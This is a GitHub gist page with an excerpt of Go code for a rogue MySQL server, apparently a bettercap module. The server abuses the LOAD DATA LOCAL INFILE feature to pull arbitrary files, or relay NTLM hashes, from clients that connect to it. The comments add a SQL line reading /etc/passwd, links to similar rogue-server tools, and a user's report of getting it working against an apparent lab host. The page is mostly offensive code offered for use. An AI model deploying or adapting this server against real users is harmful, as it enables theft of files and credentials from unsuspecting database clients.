Skip to content

Instantly share code, notes, and snippets.

@bmaia
Last active May 4, 2020 19:37
Show Gist options
  • Save bmaia/adc503231ffff19a77aaf0c7abd2e895 to your computer and use it in GitHub Desktop.
Save bmaia/adc503231ffff19a77aaf0c7abd2e895 to your computer and use it in GitHub Desktop.
for mysql.Running() {
// tcp listener
conn, err := mysql.listener.AcceptTCP()
if err != nil {
log.Warning("Error while accepting TCP connection: %s", err)
continue
}
// send the mysql greeting
conn.Write([]byte(MySQLGreeting))
// read the incoming responses and retrieve infile
// TODO: include binary support and files > 16kb
b := make([]byte, 16384)
bufio.NewReader(conn).Read(b)
// parse client capabilities and validate connection
// TODO: parse mysql connections properly and
// display additional connection attributes
clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8)))
if len(clientCapabilities) == 16 {
remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0]
log.Info("MySQL connection from: %s", remoteAddress)
loadData := string(clientCapabilities[8])
log.Info("Can Use LOAD DATA LOCAL: %s", loadData)
username := bytes.Split(b[36:], []byte{0})[0]
log.Info("MySQL Login Request Username: %s", username)
// send initial responseOK
conn.Write([]byte(FirstResponseOK))
bufio.NewReader(conn).Read(b)
conn.Write([]byte(GetFile))
infileLen, err := bufio.NewReader(conn).Read(b)
if err != nil {
log.Warning("Error while reading buffer: %s", err)
continue
}
// check if the infile is an UNC path
if strings.HasPrefix(mysql.infile, "\\") {
log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile)
} else {
// print the infile content, ignore mysql protocol headers
// TODO: include binary support and output to a file
log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4])
}
// send additional response
conn.Write([]byte(SecondResponseOK))
bufio.NewReader(conn).Read(b)
}
defer conn.Close()
(...)
@bmaia
Copy link
Author

bmaia commented May 4, 2020

You can try to use other Rogue MySQL clients like the one below:

https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py

The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to LOAD INDATA, check the mysql packets and try to replay them (see the snippets below for an example):

https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py#L112-L114

load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

The post below is a good (and more recent) reference:

https://medium.com/@knownsec404team/mysql-client-arbitrary-file-reading-attack-chain-extension-727bb63f578c

@guanicoe
Copy link

guanicoe commented May 4, 2020

ok i'll give it a try. I did first try https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py but it spat a lot of exceptions and reading your post https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html I thought I'd give bettercap a try as everything was integrated

#python rogue_mysql_server.py 
error: uncaptured python exception, closing channel <__main__.http_request_handler connected 10.10.10.187:49106 at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/asyncore.py|read|83] [/usr/lib/python2.7/asyncore.py|handle_read_event|449] [/usr/lib/python2.7/asynchat.py|handle_read|147] [rogue_mysql_server.py|found_terminator|184])

@guanicoe
Copy link

guanicoe commented May 4, 2020

Just to let you know that your module works great, and that i was to blame.The error came from a malformed sql query

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment